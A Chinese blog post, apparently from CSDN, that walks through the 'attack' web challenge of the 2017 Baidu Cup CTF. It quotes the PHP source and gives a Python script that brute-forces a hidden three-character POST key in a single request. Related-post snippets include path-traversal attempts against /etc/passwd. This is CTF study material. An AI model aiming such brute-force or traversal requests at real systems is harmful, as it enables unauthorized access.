百度杯 "2017春秋欢乐赛 攻击"

最新推荐文章于 2022-04-04 22:36:05 发布
最新推荐文章于 2022-04-04 22:36:05 发布
阅读量1k 收藏 1
点赞数
分类专栏: web安全学习 python学习 文章标签: 百度杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40491569/article/details/83690574
版权

打开题目网址,代码就被高亮出来

<?php
header("content-type:text/html;charset=utf-8");
show_source(__FILE__);
echo '<pre>';
include('u/ip.php');
include('flag.php');
if (in_array($_SERVER['REMOTE_ADDR'],$ip)){
  die("您的ip已进入系统黑名单");
}
echo "hello";
var_dump($ip);

if ($_POST[substr($flag,5,3)]=='attack'){
  echo $flag;
}else if (count($_POST)>0){
  $ip = '$ip[]="'.$_SERVER['REMOTE_ADDR'].'";'.PHP_EOL; 
  file_put_contents('u/ip.php',$ip,FILE_APPEND);
}
echo '</pre>';
?>

代码表明你只有一次的攻击机会

没办法,只能穷举$flag中从第六的位置开始的长度为3的字符串,然后将所有穷举出来的结果post方式,一次性提交,这种方法的前提是要猜$flag中有哪些字符。一旦少了某个字符,就凉凉了。。

写个python脚本

import requests
flagChar="0123456789abcdefgh"
url="http://a19387d3be524b46a3c917d3d91cdde1fe047abb5cf449da.game.ichunqiu.com/"
dictData={}
for a in flagChar:
    for b in flagChar:
        for c in flagChar:
            dictData[a+b+c]="attack"
print(dictData)
res=requests.post(url,data=dictData)
print(res.text)

不过这道题不知道现在什么情况,返回500状态码

TGAO
关注
专栏目录
WP 4 i春秋_2017春秋欢乐
segOt
04-20 4520
时间 象棋 时间 多线程、爆破 这道题目给出如下源码<?php header("content-type:text/html;charset=utf-8"); '天下武功唯快不破'; setcookie('token','hello'); show_source(__FILE__); if ($_COOKIE['token']=='hello'){ $txt = file_get_cont
i春秋百度”CTF比 十月场 Gift
include_heqile的博客
10-24 2490
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
百度2017春秋欢乐 攻击
feng的博客
10-26 354
WP 这道题主要还是自己的思维太局限了,还有就是python学的太差。。。 首先进入环境,是源码直接出: <?php header("content-type:text/html;charset=utf-8"); show_source(__FILE__); echo '<pre>'; include('u/ip.php'); include('flag.php'); if (in_array($_SERVER['REMOTE_ADDR'],$ip)){ die("您的ip已进入系
百度2017春秋欢乐】web 攻击
weixin_45844670的博客
08-17 461
题目链接:https://www.ichunqiu.com/battalion?t=1&r=57451 分析代码: $_SEVER的解析:https://blog.csdn.net/weixin_45844670/article/details/108052294 (1)若当前IP与$ ip变量的内容相同,则提示信息直接退出。 (2)当POST中某id的键值等于’attack’时,打印$flag。这个id为 $flag的第6个位置开始,长度为3的一个字符串。(之所以是从第6个,是因为flag{已经
百度2017春秋欢乐
网络安全博客
01-16 2217
百度CTF2017春秋欢乐第一场
【wp】百度2017春秋欢乐
weixin_34279184的博客
06-27 315
|@0x01 小电影 |@0x02 水果宴 |@0x03 内涵图 百度2017春秋欢乐 === 第一场 --- 0x01 小电影 分值:50分 类型:Misc已解答 题目:我说过这次比是让大家开开心心的度过的所以送给你们一个小电影 附件下载:ht去除tp://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/1yue...
百度2017春秋欢乐 象棋
feng的博客
09-30 495
不会下象棋,看了规则玩了几局,被按着打。出题人在哪???? f12看看源码,发现这样的正则表达式: 就是第五行那部分。直接用burp进行爆破,一共49000条,点击爆破然后去开一把,被按着打之后发现爆破好了,得到flag: 爆破的姿势是这样的: 用集束炸弹,然后每个载荷根据正则表达式进行爆破。 气抖冷,不会下象棋的我什么时候才能站起来。 ...
详细讲解第二届春秋欢乐ReCreators的解题思路,适合新手
yusmiling的博客
01-26 454
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入
百度”CTF比 2017 二月场--Zone
Oavinci的博客
05-17 676
提示未登录 BP抓包修改login=1,成功登录 点击manage抓包,修改login=1,返回包中发现有个302页面跳转 尝试访问系统配置文件 GET /manages/admin.php?module=/etc/passwd&name= 无回显 GET /manages/admin.php?module=../../../etc/passwd&name= 无回显 怀疑过滤了../ 尝试用..././ GET /manages/admin.php?modul...
i春秋 第二届春秋欢乐 CryMisc Writeup
XhyEax的专栏
01-26 806
解压 把压缩文件解压,得到crypto.zip和jiami.py,而前者中包含有jiami.py,构造一个zip出来查看CRC,发现是同一文件,所以进行明文攻击。 然后将其中的gogogo.zip解压,得到三个文件 查看代码 打开AESencrypt.py,查看代码: # -*- coding:utf8 -*- from Crypto.Cipher import AES s=open('nex...
百度2017春秋欢乐-------------象棋
大方子
09-04 1186
============================= 个人收获: 1.审查网页元素要仔细   =============================   题目:     抓包的时候看到一些奇怪的信息   在审查元素的时候发现这个 很明显是一个正则表达式,猜测应该就是flag文件的位置了 flag的文件名称是由【abcmlyx】的其中2位+ctf+【0...
百度2017春秋欢乐-----时间
大方子
08-12 1643
============================= 个人收获: 1.show_source(),file_get_contents(),mt_rand(),file_put_contents(),unlink()函数的意思 2.python的MD5加密写法   =============================   题目:   解释下源码的大概意思 show...
百度2017春秋欢乐】misc 内涵图
weixin_45844670的博客
08-17 360
题目链接:https://www.ichunqiu.com/battalion?t=1&r=57451 下载附件,用7z打开,一直点下去 是一个故事 看完觉得没啥啊 把图片解压出来 查看属性
百度2017春秋欢乐WP--web
Oavinci的博客
06-03 745
一、攻击 $_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。 PHP编程中经常需要用到一些服务器的一些资料,$_SERVER的详细参数参考: https://www.cnblogs.com/feng12345/p/5377258.html if (in_array($_SERVER['REMOTE_ADDR'],$ip)){ die("您的...
2017 百度春秋欢乐 writeup
weixin_30897079的博客
12-13 358
1. 内涵图(Misc) 题目: 我不是一个简单的图片 我是一个有内涵的图片 解:保存到桌面,右键属性->详细信息,即可获得flag. 2. 小电影(Misc) 题目: 我说过 这次比是让大家开开心心的度过的 所以 送给你们一个小电影 解:图片被损坏。 (1)检查文件头,发现没有GIF8,用winhex补上。 (2)重新打开gif,图片已修复。 (3)使用Stegsolve分帧查...
i春秋——Misc之百度
落花四月
03-27 590
今天心里很是不开森,想想往日何必那么努力呢?不如你的比比皆是,可是人家就是因为有关系,你又能怎样呢? 你所有应该有的都被打翻了,别灰心,至少你曾经努力过! 愿我未来的学弟学妹们都能一直开开心心的过好每一天! 纵使有许多人不想看到你的光芒但你也要加油,继续努力! 永远爱你们的! ——————新宝宝 1: 解题思路;看见这一题我们很明显能够想到是摩斯解密,就可以了,但是要更改一下摩斯...
百度”CTF比 2017 二月场 wp
qq_61768489的博客
04-04 1500
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.
Mark loves cat
m0_62094846的博客
04-04 1677
扫描目录(但是我用御剑扫不出来),然后用.git下载文件 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){    //很明显的有变量覆写漏洞 $$x = $y ; } foreach($_GET as $x => $y){    //如果传入$x=flag&$y=flag 则$flag=$flag就可以.
php in_array(),substr(),file_put_concents(),PHP_EOL,count()
h3110n3w0r1d
11-04 538
&lt;?php header("content-type:text/html;charset=utf-8"); show_source(__FILE__); echo '&lt;pre&gt;'; include('u/ip.php'); include('flag.php'); if (in_array($_SERVER['REMOTE_ADDR'],$ip)){ die("您的ip已进...
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值